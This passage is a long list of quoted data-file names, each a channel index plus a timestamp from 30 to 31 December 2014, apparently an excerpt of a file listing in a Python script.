'data3Tue_Dec_30_22_06_14_2014.txt',
'data3Tue_Dec_30_22_06_29_2014.txt',
'data3Tue_Dec_30_22_06_44_2014.txt',
'data3Tue_Dec_30_22_06_59_2014.txt',
'data3Tue_Dec_30_22_07_14_2014.txt',
'data3Tue_Dec_30_22_07_29_2014.txt',
'data3Tue_Dec_30_22_07_43_2014.txt',
'data3Tue_Dec_30_22_07_58_2014.txt',
'data3Tue_Dec_30_22_08_13_2014.txt',
'data3Tue_Dec_30_22_08_28_2014.txt',
'data3Tue_Dec_30_22_08_43_2014.txt',
'data3Tue_Dec_30_22_08_57_2014.txt',
'data3Tue_Dec_30_22_09_12_2014.txt',
'data3Tue_Dec_30_22_09_27_2014.txt',
'data3Tue_Dec_30_22_09_42_2014.txt',
'data3Tue_Dec_30_22_09_57_2014.txt',
'data3Tue_Dec_30_22_10_12_2014.txt',
'data3Tue_Dec_30_22_10_26_2014.txt',
'data3Tue_Dec_30_22_10_41_2014.txt',
'data3Tue_Dec_30_22_10_56_2014.txt',
'data3Tue_Dec_30_22_11_11_2014.txt',
'data3Tue_Dec_30_22_11_25_2014.txt',
'data3Tue_Dec_30_22_11_41_2014.txt',
'data3Tue_Dec_30_22_11_56_2014.txt',
'data3Tue_Dec_30_22_12_11_2014.txt',
'data3Tue_Dec_30_22_12_26_2014.txt',
'data3Tue_Dec_30_22_12_40_2014.txt',
'data3Tue_Dec_30_22_12_55_2014.txt',
'data3Tue_Dec_30_22_13_10_2014.txt',
'data3Tue_Dec_30_22_13_25_2014.txt',
'data3Tue_Dec_30_22_13_40_2014.txt',
'data3Tue_Dec_30_22_13_55_2014.txt',
'data3Tue_Dec_30_22_14_09_2014.txt',
'data3Tue_Dec_30_22_14_24_2014.txt',
'data3Tue_Dec_30_22_14_39_2014.txt',
'data3Tue_Dec_30_22_14_53_2014.txt',
'data3Tue_Dec_30_22_15_08_2014.txt',
'data3Tue_Dec_30_22_15_23_2014.txt',
'data3Tue_Dec_30_22_15_37_2014.txt',
'data3Tue_Dec_30_22_15_52_2014.txt',
'data3Tue_Dec_30_22_16_07_2014.txt',
'data3Tue_Dec_30_22_16_22_2014.txt',
'data3Tue_Dec_30_22_16_36_2014.txt',
'data3Tue_Dec_30_22_16_51_2014.txt',
'data3Tue_Dec_30_22_17_06_2014.txt',
'data0Tue_Dec_30_22_17_47_2014.txt',
'data0Tue_Dec_30_22_18_01_2014.txt',
'data0Tue_Dec_30_22_18_16_2014.txt',
'data0Tue_Dec_30_22_18_31_2014.txt',
'data0Tue_Dec_30_22_18_46_2014.txt',
'data0Tue_Dec_30_22_19_01_2014.txt',
'data0Tue_Dec_30_22_19_15_2014.txt',
'data0Tue_Dec_30_22_19_30_2014.txt',
'data0Tue_Dec_30_22_19_45_2014.txt',
'data0Tue_Dec_30_22_20_00_2014.txt',
'data0Tue_Dec_30_22_20_15_2014.txt',
'data0Tue_Dec_30_22_20_30_2014.txt',
'data0Tue_Dec_30_22_20_44_2014.txt',
'data0Tue_Dec_30_22_20_59_2014.txt',
'data0Tue_Dec_30_22_21_14_2014.txt',
'data0Tue_Dec_30_22_21_29_2014.txt',
'data0Tue_Dec_30_22_21_44_2014.txt',
'data0Tue_Dec_30_22_21_58_2014.txt',
'data0Tue_Dec_30_22_22_13_2014.txt',
'data0Tue_Dec_30_22_22_28_2014.txt',
'data0Tue_Dec_30_22_22_43_2014.txt',
'data0Tue_Dec_30_22_22_58_2014.txt',
'data0Tue_Dec_30_22_23_12_2014.txt',
'data0Tue_Dec_30_22_23_27_2014.txt',
'data0Tue_Dec_30_22_23_42_2014.txt',
'data0Tue_Dec_30_22_23_57_2014.txt',
'data0Tue_Dec_30_22_24_12_2014.txt',
'data0Tue_Dec_30_22_24_26_2014.txt',
'data0Tue_Dec_30_22_24_41_2014.txt',
'data0Tue_Dec_30_22_24_56_2014.txt',
'data0Tue_Dec_30_22_25_11_2014.txt',
'data0Tue_Dec_30_22_25_25_2014.txt',
'data0Tue_Dec_30_22_25_41_2014.txt',
'data0Tue_Dec_30_22_25_55_2014.txt',
'data0Tue_Dec_30_22_26_10_2014.txt',
'data0Tue_Dec_30_22_26_25_2014.txt',
'data0Tue_Dec_30_22_26_39_2014.txt',
'data0Tue_Dec_30_22_26_54_2014.txt',
'data0Tue_Dec_30_22_27_09_2014.txt',
'data0Tue_Dec_30_22_27_24_2014.txt',
'data0Tue_Dec_30_22_27_39_2014.txt',
'data0Tue_Dec_30_22_27_54_2014.txt',
'data0Tue_Dec_30_22_28_09_2014.txt',
'data0Tue_Dec_30_22_28_23_2014.txt',
'data0Tue_Dec_30_22_28_38_2014.txt',
'data0Tue_Dec_30_22_28_53_2014.txt',
'data0Tue_Dec_30_22_29_08_2014.txt',
'data0Tue_Dec_30_22_29_23_2014.txt',
'data0Tue_Dec_30_22_29_37_2014.txt',
'data0Tue_Dec_30_22_29_52_2014.txt',
'data1Tue_Dec_30_22_30_07_2014.txt',
'data1Tue_Dec_30_22_30_21_2014.txt',
'data1Tue_Dec_30_22_30_36_2014.txt',
'data1Tue_Dec_30_22_30_51_2014.txt',
'data1Tue_Dec_30_22_31_06_2014.txt',
'data1Tue_Dec_30_22_31_20_2014.txt',
'data1Tue_Dec_30_22_31_35_2014.txt',
'data1Tue_Dec_30_22_31_49_2014.txt',
'data1Tue_Dec_30_22_32_04_2014.txt',
'data1Tue_Dec_30_22_32_19_2014.txt',
'data1Tue_Dec_30_22_32_34_2014.txt',
'data1Tue_Dec_30_22_32_48_2014.txt',
'data1Tue_Dec_30_22_33_03_2014.txt',
'data1Tue_Dec_30_22_33_18_2014.txt',
'data1Tue_Dec_30_22_33_33_2014.txt',
'data1Tue_Dec_30_22_33_48_2014.txt',
'data1Tue_Dec_30_22_34_03_2014.txt',
'data1Tue_Dec_30_22_34_17_2014.txt',
'data1Tue_Dec_30_22_34_32_2014.txt',
'data1Tue_Dec_30_22_34_47_2014.txt',
'data1Tue_Dec_30_22_35_01_2014.txt',
'data1Tue_Dec_30_22_35_16_2014.txt',
'data1Tue_Dec_30_22_35_31_2014.txt',
'data1Tue_Dec_30_22_35_46_2014.txt',
'data1Tue_Dec_30_22_36_01_2014.txt',
'data1Tue_Dec_30_22_36_16_2014.txt',
'data1Tue_Dec_30_22_36_30_2014.txt',
'data1Tue_Dec_30_22_36_45_2014.txt',
'data1Tue_Dec_30_22_37_00_2014.txt',
'data1Tue_Dec_30_22_37_15_2014.txt',
'data1Tue_Dec_30_22_37_30_2014.txt',
'data1Tue_Dec_30_22_37_44_2014.txt',
'data1Tue_Dec_30_22_37_59_2014.txt',
'data1Tue_Dec_30_22_38_14_2014.txt',
'data1Tue_Dec_30_22_38_28_2014.txt',
'data1Tue_Dec_30_22_38_44_2014.txt',
'data1Tue_Dec_30_22_38_58_2014.txt',
'data1Tue_Dec_30_22_39_13_2014.txt',
'data1Tue_Dec_30_22_39_28_2014.txt',
'data1Tue_Dec_30_22_39_42_2014.txt',
'data1Tue_Dec_30_22_39_57_2014.txt',
'data1Tue_Dec_30_22_40_13_2014.txt',
'data1Tue_Dec_30_22_40_27_2014.txt',
'data1Tue_Dec_30_22_40_41_2014.txt',
'data1Tue_Dec_30_22_40_56_2014.txt',
'data1Tue_Dec_30_22_41_11_2014.txt',
'data1Tue_Dec_30_22_41_26_2014.txt',
'data1Tue_Dec_30_22_41_41_2014.txt',
'data1Tue_Dec_30_22_41_56_2014.txt',
'data1Tue_Dec_30_22_42_10_2014.txt',
'data2Tue_Dec_30_22_42_25_2014.txt',
'data2Tue_Dec_30_22_42_40_2014.txt',
'data2Tue_Dec_30_22_42_54_2014.txt',
'data2Tue_Dec_30_22_43_09_2014.txt',
'data2Tue_Dec_30_22_43_24_2014.txt',
'data2Tue_Dec_30_22_43_39_2014.txt',
'data2Tue_Dec_30_22_43_53_2014.txt',
'data2Tue_Dec_30_22_44_08_2014.txt',
'data2Tue_Dec_30_22_44_23_2014.txt',
'data2Tue_Dec_30_22_44_37_2014.txt',
'data2Tue_Dec_30_22_44_52_2014.txt',
'data2Tue_Dec_30_22_45_06_2014.txt',
'data2Tue_Dec_30_22_45_21_2014.txt',
'data2Tue_Dec_30_22_45_36_2014.txt',
'data2Tue_Dec_30_22_45_50_2014.txt',
'data2Tue_Dec_30_22_46_05_2014.txt',
'data2Tue_Dec_30_22_46_20_2014.txt',
'data2Tue_Dec_30_22_46_35_2014.txt',
'data2Tue_Dec_30_22_46_50_2014.txt',
'data2Tue_Dec_30_22_47_05_2014.txt',
'data2Tue_Dec_30_22_47_20_2014.txt',
'data2Tue_Dec_30_22_47_35_2014.txt',
'data2Tue_Dec_30_22_47_49_2014.txt',
'data2Tue_Dec_30_22_48_04_2014.txt',
'data2Tue_Dec_30_22_48_19_2014.txt',
'data2Tue_Dec_30_22_48_34_2014.txt',
'data2Tue_Dec_30_22_48_49_2014.txt',
'data2Tue_Dec_30_22_49_04_2014.txt',
'data2Tue_Dec_30_22_49_19_2014.txt',
'data2Tue_Dec_30_22_49_34_2014.txt',
'data2Tue_Dec_30_22_49_49_2014.txt',
'data2Tue_Dec_30_22_50_04_2014.txt',
'data2Tue_Dec_30_22_50_19_2014.txt',
'data2Tue_Dec_30_22_50_33_2014.txt',
'data2Tue_Dec_30_22_50_48_2014.txt',
'data2Tue_Dec_30_22_51_03_2014.txt',
'data2Tue_Dec_30_22_51_18_2014.txt',
'data2Tue_Dec_30_22_51_32_2014.txt',
'data2Tue_Dec_30_22_51_47_2014.txt',
'data2Tue_Dec_30_22_52_02_2014.txt',
'data2Tue_Dec_30_22_52_16_2014.txt',
'data2Tue_Dec_30_22_52_31_2014.txt',
'data2Tue_Dec_30_22_52_46_2014.txt',
'data2Tue_Dec_30_22_53_01_2014.txt',
'data2Tue_Dec_30_22_53_16_2014.txt',
'data2Tue_Dec_30_22_53_31_2014.txt',
'data2Tue_Dec_30_22_53_45_2014.txt',
'data2Tue_Dec_30_22_54_00_2014.txt',
'data2Tue_Dec_30_22_54_15_2014.txt',
'data2Tue_Dec_30_22_54_29_2014.txt',
'data3Tue_Dec_30_22_54_44_2014.txt',
'data3Tue_Dec_30_22_54_59_2014.txt',
'data3Tue_Dec_30_22_55_13_2014.txt',
'data3Tue_Dec_30_22_55_28_2014.txt',
'data3Tue_Dec_30_22_55_43_2014.txt',
'data3Tue_Dec_30_22_55_58_2014.txt',
'data3Tue_Dec_30_22_56_13_2014.txt',
'data3Tue_Dec_30_22_56_28_2014.txt',
'data3Tue_Dec_30_22_56_43_2014.txt',
'data3Tue_Dec_30_22_56_57_2014.txt',
'data3Tue_Dec_30_22_57_12_2014.txt',
'data3Tue_Dec_30_22_57_27_2014.txt',
'data3Tue_Dec_30_22_57_42_2014.txt',
'data3Tue_Dec_30_22_57_56_2014.txt',
'data3Tue_Dec_30_22_58_12_2014.txt',
'data3Tue_Dec_30_22_58_26_2014.txt',
'data3Tue_Dec_30_22_58_41_2014.txt',
'data3Tue_Dec_30_22_58_56_2014.txt',
'data3Tue_Dec_30_22_59_10_2014.txt',
'data3Tue_Dec_30_22_59_25_2014.txt',
'data3Tue_Dec_30_22_59_40_2014.txt',
'data3Tue_Dec_30_22_59_54_2014.txt',
'data3Tue_Dec_30_23_00_10_2014.txt',
'data3Tue_Dec_30_23_00_25_2014.txt',
'data3Tue_Dec_30_23_00_39_2014.txt',
'data3Tue_Dec_30_23_00_54_2014.txt',
'data3Tue_Dec_30_23_01_09_2014.txt',
'data3Tue_Dec_30_23_01_23_2014.txt',
'data3Tue_Dec_30_23_01_38_2014.txt',
'data3Tue_Dec_30_23_01_53_2014.txt',
'data3Tue_Dec_30_23_02_07_2014.txt',
'data3Tue_Dec_30_23_02_22_2014.txt',
'data3Tue_Dec_30_23_02_37_2014.txt',
'data3Tue_Dec_30_23_02_52_2014.txt',
'data3Tue_Dec_30_23_03_06_2014.txt',
'data3Tue_Dec_30_23_03_21_2014.txt',
'data3Tue_Dec_30_23_03_36_2014.txt',
'data3Tue_Dec_30_23_03_51_2014.txt',
'data3Tue_Dec_30_23_04_05_2014.txt',
'data3Tue_Dec_30_23_04_20_2014.txt',
'data3Tue_Dec_30_23_04_34_2014.txt',
'data3Tue_Dec_30_23_04_49_2014.txt',
'data3Tue_Dec_30_23_05_04_2014.txt',
'data3Tue_Dec_30_23_05_19_2014.txt',
'data3Tue_Dec_30_23_05_34_2014.txt',
'data3Tue_Dec_30_23_05_49_2014.txt',
'data3Tue_Dec_30_23_06_04_2014.txt',
'data3Tue_Dec_30_23_06_18_2014.txt',
'data3Tue_Dec_30_23_06_33_2014.txt',
'data3Tue_Dec_30_23_06_48_2014.txt',
'data0Tue_Dec_30_23_07_28_2014.txt',
'data0Tue_Dec_30_23_07_42_2014.txt',
'data0Tue_Dec_30_23_07_58_2014.txt',
'data0Tue_Dec_30_23_08_12_2014.txt',
'data0Tue_Dec_30_23_08_27_2014.txt',
'data0Tue_Dec_30_23_08_42_2014.txt',
'data0Tue_Dec_30_23_08_57_2014.txt',
'data0Tue_Dec_30_23_09_12_2014.txt',
'data0Tue_Dec_30_23_09_27_2014.txt',
'data0Tue_Dec_30_23_09_42_2014.txt',
'data0Tue_Dec_30_23_09_57_2014.txt',
'data0Tue_Dec_30_23_10_12_2014.txt',
'data0Tue_Dec_30_23_10_26_2014.txt',
'data0Tue_Dec_30_23_10_42_2014.txt',
'data0Tue_Dec_30_23_10_57_2014.txt',
'data0Tue_Dec_30_23_11_12_2014.txt',
'data0Tue_Dec_30_23_11_27_2014.txt',
'data0Tue_Dec_30_23_11_42_2014.txt',
'data0Tue_Dec_30_23_11_56_2014.txt',
'data0Tue_Dec_30_23_12_11_2014.txt',
'data0Tue_Dec_30_23_12_26_2014.txt',
'data0Tue_Dec_30_23_12_40_2014.txt',
'data0Tue_Dec_30_23_12_55_2014.txt',
'data0Tue_Dec_30_23_13_10_2014.txt',
'data0Tue_Dec_30_23_13_25_2014.txt',
'data0Tue_Dec_30_23_13_40_2014.txt',
'data0Tue_Dec_30_23_13_55_2014.txt',
'data0Tue_Dec_30_23_14_11_2014.txt',
'data0Tue_Dec_30_23_14_26_2014.txt',
'data0Tue_Dec_30_23_14_40_2014.txt',
'data0Tue_Dec_30_23_14_55_2014.txt',
'data0Tue_Dec_30_23_15_09_2014.txt',
'data0Tue_Dec_30_23_15_24_2014.txt',
'data0Tue_Dec_30_23_15_39_2014.txt',
'data0Tue_Dec_30_23_15_54_2014.txt',
'data0Tue_Dec_30_23_16_08_2014.txt',
'data0Tue_Dec_30_23_16_23_2014.txt',
'data0Tue_Dec_30_23_16_37_2014.txt',
'data0Tue_Dec_30_23_16_52_2014.txt',
'data0Tue_Dec_30_23_17_08_2014.txt',
'data0Tue_Dec_30_23_17_23_2014.txt',
'data0Tue_Dec_30_23_17_37_2014.txt',
'data0Tue_Dec_30_23_17_52_2014.txt',
'data0Tue_Dec_30_23_18_07_2014.txt',
'data0Tue_Dec_30_23_18_22_2014.txt',
'data0Tue_Dec_30_23_18_36_2014.txt',
'data0Tue_Dec_30_23_18_51_2014.txt',
'data0Tue_Dec_30_23_19_06_2014.txt',
'data0Tue_Dec_30_23_19_21_2014.txt',
'data0Tue_Dec_30_23_19_36_2014.txt',
'data1Tue_Dec_30_23_19_50_2014.txt',
'data1Tue_Dec_30_23_20_05_2014.txt',
'data1Tue_Dec_30_23_20_20_2014.txt',
'data1Tue_Dec_30_23_20_34_2014.txt',
'data1Tue_Dec_30_23_20_49_2014.txt',
'data1Tue_Dec_30_23_21_04_2014.txt',
'data1Tue_Dec_30_23_21_19_2014.txt',
'data1Tue_Dec_30_23_21_33_2014.txt',
'data1Tue_Dec_30_23_21_48_2014.txt',
'data1Tue_Dec_30_23_22_03_2014.txt',
'data1Tue_Dec_30_23_22_18_2014.txt',
'data1Tue_Dec_30_23_22_33_2014.txt',
'data1Tue_Dec_30_23_22_48_2014.txt',
'data1Tue_Dec_30_23_23_03_2014.txt',
'data1Tue_Dec_30_23_23_17_2014.txt',
'data1Tue_Dec_30_23_23_32_2014.txt',
'data1Tue_Dec_30_23_23_47_2014.txt',
'data1Tue_Dec_30_23_24_02_2014.txt',
'data1Tue_Dec_30_23_24_16_2014.txt',
'data1Tue_Dec_30_23_24_31_2014.txt',
'data1Tue_Dec_30_23_24_45_2014.txt',
'data1Tue_Dec_30_23_25_00_2014.txt',
'data1Tue_Dec_30_23_25_15_2014.txt',
'data1Tue_Dec_30_23_25_29_2014.txt',
'data1Tue_Dec_30_23_25_44_2014.txt',
'data1Tue_Dec_30_23_25_59_2014.txt',
'data1Tue_Dec_30_23_26_13_2014.txt',
'data1Tue_Dec_30_23_26_28_2014.txt',
'data1Tue_Dec_30_23_26_43_2014.txt',
'data1Tue_Dec_30_23_26_58_2014.txt',
'data1Tue_Dec_30_23_27_13_2014.txt',
'data1Tue_Dec_30_23_27_27_2014.txt',
'data1Tue_Dec_30_23_27_42_2014.txt',
'data1Tue_Dec_30_23_27_57_2014.txt',
'data1Tue_Dec_30_23_28_11_2014.txt',
'data1Tue_Dec_30_23_28_26_2014.txt',
'data1Tue_Dec_30_23_28_42_2014.txt',
'data1Tue_Dec_30_23_28_56_2014.txt',
'data1Tue_Dec_30_23_29_11_2014.txt',
'data1Tue_Dec_30_23_29_26_2014.txt',
'data1Tue_Dec_30_23_29_41_2014.txt',
'data1Tue_Dec_30_23_29_56_2014.txt',
'data1Tue_Dec_30_23_30_10_2014.txt',
'data1Tue_Dec_30_23_30_25_2014.txt',
'data1Tue_Dec_30_23_30_40_2014.txt',
'data1Tue_Dec_30_23_30_55_2014.txt',
'data1Tue_Dec_30_23_31_10_2014.txt',
'data1Tue_Dec_30_23_31_25_2014.txt',
'data1Tue_Dec_30_23_31_39_2014.txt',
'data1Tue_Dec_30_23_31_54_2014.txt',
'data2Tue_Dec_30_23_32_09_2014.txt',
'data2Tue_Dec_30_23_32_24_2014.txt',
'data2Tue_Dec_30_23_32_39_2014.txt',
'data2Tue_Dec_30_23_32_53_2014.txt',
'data2Tue_Dec_30_23_33_08_2014.txt',
'data2Tue_Dec_30_23_33_23_2014.txt',
'data2Tue_Dec_30_23_33_38_2014.txt',
'data2Tue_Dec_30_23_33_53_2014.txt',
'data2Tue_Dec_30_23_34_08_2014.txt',
'data2Tue_Dec_30_23_34_23_2014.txt',
'data2Tue_Dec_30_23_34_37_2014.txt',
'data2Tue_Dec_30_23_34_52_2014.txt',
'data2Tue_Dec_30_23_35_07_2014.txt',
'data2Tue_Dec_30_23_35_22_2014.txt',
'data2Tue_Dec_30_23_35_37_2014.txt',
'data2Tue_Dec_30_23_35_52_2014.txt',
'data2Tue_Dec_30_23_36_07_2014.txt',
'data2Tue_Dec_30_23_36_22_2014.txt',
'data2Tue_Dec_30_23_36_36_2014.txt',
'data2Tue_Dec_30_23_36_51_2014.txt',
'data2Tue_Dec_30_23_37_06_2014.txt',
'data2Tue_Dec_30_23_37_20_2014.txt',
'data2Tue_Dec_30_23_37_35_2014.txt',
'data2Tue_Dec_30_23_37_50_2014.txt',
'data2Tue_Dec_30_23_38_05_2014.txt',
'data2Tue_Dec_30_23_38_20_2014.txt',
'data2Tue_Dec_30_23_38_35_2014.txt',
'data2Tue_Dec_30_23_38_50_2014.txt',
'data2Tue_Dec_30_23_39_05_2014.txt',
'data2Tue_Dec_30_23_39_19_2014.txt',
'data2Tue_Dec_30_23_39_34_2014.txt',
'data2Tue_Dec_30_23_39_49_2014.txt',
'data2Tue_Dec_30_23_40_04_2014.txt',
'data2Tue_Dec_30_23_40_18_2014.txt',
'data2Tue_Dec_30_23_40_33_2014.txt',
'data2Tue_Dec_30_23_40_48_2014.txt',
'data2Tue_Dec_30_23_41_03_2014.txt',
'data2Tue_Dec_30_23_41_18_2014.txt',
'data2Tue_Dec_30_23_41_33_2014.txt',
'data2Tue_Dec_30_23_41_48_2014.txt',
'data2Tue_Dec_30_23_42_03_2014.txt',
'data2Tue_Dec_30_23_42_18_2014.txt',
'data2Tue_Dec_30_23_42_33_2014.txt',
'data2Tue_Dec_30_23_42_47_2014.txt',
'data2Tue_Dec_30_23_43_02_2014.txt',
'data2Tue_Dec_30_23_43_18_2014.txt',
'data2Tue_Dec_30_23_43_33_2014.txt',
'data2Tue_Dec_30_23_43_47_2014.txt',
'data2Tue_Dec_30_23_44_02_2014.txt',
'data2Tue_Dec_30_23_44_17_2014.txt',
'data3Tue_Dec_30_23_44_32_2014.txt',
'data3Tue_Dec_30_23_44_46_2014.txt',
'data3Tue_Dec_30_23_45_01_2014.txt',
'data3Tue_Dec_30_23_45_16_2014.txt',
'data3Tue_Dec_30_23_45_31_2014.txt',
'data3Tue_Dec_30_23_45_46_2014.txt',
'data3Tue_Dec_30_23_46_00_2014.txt',
'data3Tue_Dec_30_23_46_16_2014.txt',
'data3Tue_Dec_30_23_46_31_2014.txt',
'data3Tue_Dec_30_23_46_46_2014.txt',
'data3Tue_Dec_30_23_47_01_2014.txt',
'data3Tue_Dec_30_23_47_16_2014.txt',
'data3Tue_Dec_30_23_47_31_2014.txt',
'data3Tue_Dec_30_23_47_46_2014.txt',
'data3Tue_Dec_30_23_48_01_2014.txt',
'data3Tue_Dec_30_23_48_16_2014.txt',
'data3Tue_Dec_30_23_48_31_2014.txt',
'data3Tue_Dec_30_23_48_45_2014.txt',
'data3Tue_Dec_30_23_49_00_2014.txt',
'data3Tue_Dec_30_23_49_15_2014.txt',
'data3Tue_Dec_30_23_49_30_2014.txt',
'data3Tue_Dec_30_23_49_45_2014.txt',
'data3Tue_Dec_30_23_49_59_2014.txt',
'data3Tue_Dec_30_23_50_14_2014.txt',
'data3Tue_Dec_30_23_50_29_2014.txt',
'data3Tue_Dec_30_23_50_44_2014.txt',
'data3Tue_Dec_30_23_50_59_2014.txt',
'data3Tue_Dec_30_23_51_13_2014.txt',
'data3Tue_Dec_30_23_51_28_2014.txt',
'data3Tue_Dec_30_23_51_43_2014.txt',
'data3Tue_Dec_30_23_51_57_2014.txt',
'data3Tue_Dec_30_23_52_13_2014.txt',
'data3Tue_Dec_30_23_52_28_2014.txt',
'data3Tue_Dec_30_23_52_43_2014.txt',
'data3Tue_Dec_30_23_52_58_2014.txt',
'data3Tue_Dec_30_23_53_12_2014.txt',
'data3Tue_Dec_30_23_53_27_2014.txt',
'data3Tue_Dec_30_23_53_42_2014.txt',
'data3Tue_Dec_30_23_53_56_2014.txt',
'data3Tue_Dec_30_23_54_11_2014.txt',
'data3Tue_Dec_30_23_54_26_2014.txt',
'data3Tue_Dec_30_23_54_41_2014.txt',
'data3Tue_Dec_30_23_54_56_2014.txt',
'data3Tue_Dec_30_23_55_11_2014.txt',
'data3Tue_Dec_30_23_55_26_2014.txt',
'data3Tue_Dec_30_23_55_41_2014.txt',
'data3Tue_Dec_30_23_55_55_2014.txt',
'data3Tue_Dec_30_23_56_10_2014.txt',
'data3Tue_Dec_30_23_56_25_2014.txt',
'data3Tue_Dec_30_23_56_40_2014.txt',
'data0Tue_Dec_30_23_57_21_2014.txt',
'data0Tue_Dec_30_23_57_36_2014.txt',
'data0Tue_Dec_30_23_57_51_2014.txt',
'data0Tue_Dec_30_23_58_06_2014.txt',
'data0Tue_Dec_30_23_58_20_2014.txt',
'data0Tue_Dec_30_23_58_35_2014.txt',
'data0Tue_Dec_30_23_58_50_2014.txt',
'data0Tue_Dec_30_23_59_05_2014.txt',
'data0Tue_Dec_30_23_59_20_2014.txt',
'data0Tue_Dec_30_23_59_35_2014.txt',
'data0Tue_Dec_30_23_59_49_2014.txt',
'data0Wed_Dec_31_00_00_04_2014.txt',
'data0Wed_Dec_31_00_00_18_2014.txt',
'data0Wed_Dec_31_00_00_33_2014.txt',
'data0Wed_Dec_31_00_00_48_2014.txt',
'data0Wed_Dec_31_00_01_02_2014.txt',
'data0Wed_Dec_31_00_01_17_2014.txt',
'data0Wed_Dec_31_00_01_32_2014.txt',
'data0Wed_Dec_31_00_01_48_2014.txt',
'data0Wed_Dec_31_00_02_02_2014.txt',
'data0Wed_Dec_31_00_02_18_2014.txt',
'data0Wed_Dec_31_00_02_32_2014.txt',
'data0Wed_Dec_31_00_02_47_2014.txt',
'data0Wed_Dec_31_00_03_01_2014.txt',
'data0Wed_Dec_31_00_03_17_2014.txt',
'data0Wed_Dec_31_00_03_32_2014.txt',
'data0Wed_Dec_31_00_03_46_2014.txt',
'data0Wed_Dec_31_00_04_01_2014.txt',
'data0Wed_Dec_31_00_04_16_2014.txt',
'data0Wed_Dec_31_00_04_31_2014.txt',
'data0Wed_Dec_31_00_04_46_2014.txt',
'data0Wed_Dec_31_00_05_00_2014.txt',
'data0Wed_Dec_31_00_05_15_2014.txt',
'data0Wed_Dec_31_00_05_31_2014.txt',
'data0Wed_Dec_31_00_05_46_2014.txt',
'data0Wed_Dec_31_00_06_01_2014.txt',
'data0Wed_Dec_31_00_06_15_2014.txt',
'data0Wed_Dec_31_00_06_30_2014.txt',
'data0Wed_Dec_31_00_06_45_2014.txt',
'data0Wed_Dec_31_00_07_00_2014.txt',
'data0Wed_Dec_31_00_07_14_2014.txt',
'data0Wed_Dec_31_00_07_29_2014.txt',
'data0Wed_Dec_31_00_07_44_2014.txt',
'data0Wed_Dec_31_00_07_59_2014.txt',
'data0Wed_Dec_31_00_08_13_2014.txt',
'data0Wed_Dec_31_00_08_28_2014.txt',
'data0Wed_Dec_31_00_08_43_2014.txt',
'data0Wed_Dec_31_00_08_57_2014.txt',
'data0Wed_Dec_31_00_09_12_2014.txt',
'data0Wed_Dec_31_00_09_27_2014.txt',
'data1Wed_Dec_31_00_09_42_2014.txt',
'data1Wed_Dec_31_00_09_57_2014.txt',
'data1Wed_Dec_31_00_10_11_2014.txt',
'data1Wed_Dec_31_00_10_26_2014.txt',
'data1Wed_Dec_31_00_10_41_2014.txt',
'data1Wed_Dec_31_00_10_56_2014.txt',
'data1Wed_Dec_31_00_11_11_2014.txt',
'data1Wed_Dec_31_00_11_26_2014.txt',
'data1Wed_Dec_31_00_11_40_2014.txt',
'data1Wed_Dec_31_00_11_55_2014.txt',
'data1Wed_Dec_31_00_12_10_2014.txt',
'data1Wed_Dec_31_00_12_25_2014.txt',
'data1Wed_Dec_31_00_12_40_2014.txt',
'data1Wed_Dec_31_00_12_54_2014.txt',
'data1Wed_Dec_31_00_13_09_2014.txt',
'data1Wed_Dec_31_00_13_24_2014.txt',
'data1Wed_Dec_31_00_13_39_2014.txt',
'data1Wed_Dec_31_00_13_54_2014.txt',
'data1Wed_Dec_31_00_14_09_2014.txt',
'data1Wed_Dec_31_00_14_24_2014.txt',
'data1Wed_Dec_31_00_14_38_2014.txt',
'data1Wed_Dec_31_00_14_53_2014.txt',
'data1Wed_Dec_31_00_15_07_2014.txt',
'data1Wed_Dec_31_00_15_22_2014.txt',
'data1Wed_Dec_31_00_15_37_2014.txt',
'data1Wed_Dec_31_00_15_52_2014.txt',
'data1Wed_Dec_31_00_16_06_2014.txt',
'data1Wed_Dec_31_00_16_22_2014.txt',
'data1Wed_Dec_31_00_16_38_2014.txt',
'data1Wed_Dec_31_00_16_52_2014.txt',
'data1Wed_Dec_31_00_17_07_2014.txt',
'data1Wed_Dec_31_00_17_22_2014.txt',
'data1Wed_Dec_31_00_17_37_2014.txt',
'data1Wed_Dec_31_00_17_51_2014.txt',
'data1Wed_Dec_31_00_18_06_2014.txt',
'data1Wed_Dec_31_00_18_20_2014.txt',
'data1Wed_Dec_31_00_18_35_2014.txt',
'data1Wed_Dec_31_00_18_50_2014.txt',
'data1Wed_Dec_31_00_19_04_2014.txt',
'data1Wed_Dec_31_00_19_19_2014.txt',
'data1Wed_Dec_31_00_19_34_2014.txt',
'data1Wed_Dec_31_00_19_48_2014.txt',
'data1Wed_Dec_31_00_20_03_2014.txt',
'data1Wed_Dec_31_00_20_18_2014.txt',
'data1Wed_Dec_31_00_20_33_2014.txt',
'data1Wed_Dec_31_00_20_48_2014.txt',
'data1Wed_Dec_31_00_21_03_2014.txt',
'data1Wed_Dec_31_00_21_18_2014.txt',
'data1Wed_Dec_31_00_21_32_2014.txt',
'data1Wed_Dec_31_00_21_47_2014.txt',
'data2Wed_Dec_31_00_22_02_2014.txt',
'data2Wed_Dec_31_00_22_17_2014.txt',
'data2Wed_Dec_31_00_22_32_2014.txt',
'data2Wed_Dec_31_00_22_47_2014.txt',
'data2Wed_Dec_31_00_23_01_2014.txt',
'data2Wed_Dec_31_00_23_16_2014.txt',
'data2Wed_Dec_31_00_23_31_2014.txt',
'data2Wed_Dec_31_00_23_46_2014.txt',
'data2Wed_Dec_31_00_24_01_2014.txt',
'data2Wed_Dec_31_00_24_16_2014.txt',
'data2Wed_Dec_31_00_24_30_2014.txt',
'data2Wed_Dec_31_00_24_45_2014.txt',
'data2Wed_Dec_31_00_25_00_2014.txt',
'data2Wed_Dec_31_00_25_15_2014.txt',
'data2Wed_Dec_31_00_25_29_2014.txt',
'data2Wed_Dec_31_00_25_44_2014.txt',
'data2Wed_Dec_31_00_25_59_2014.txt',
'data2Wed_Dec_31_00_26_14_2014.txt',
'data2Wed_Dec_31_00_26_29_2014.txt',
'data2Wed_Dec_31_00_26_43_2014.txt',
'data2Wed_Dec_31_00_26_59_2014.txt',
'data2Wed_Dec_31_00_27_13_2014.txt',
'data2Wed_Dec_31_00_27_28_2014.txt',
'data2Wed_Dec_31_00_27_43_2014.txt',
'data2Wed_Dec_31_00_27_58_2014.txt',
'data2Wed_Dec_31_00_28_13_2014.txt',
'data2Wed_Dec_31_00_28_28_2014.txt',
'data2Wed_Dec_31_00_28_43_2014.txt',
'data2Wed_Dec_31_00_28_57_2014.txt',
'data2Wed_Dec_31_00_29_12_2014.txt',
'data2Wed_Dec_31_00_29_27_2014.txt',
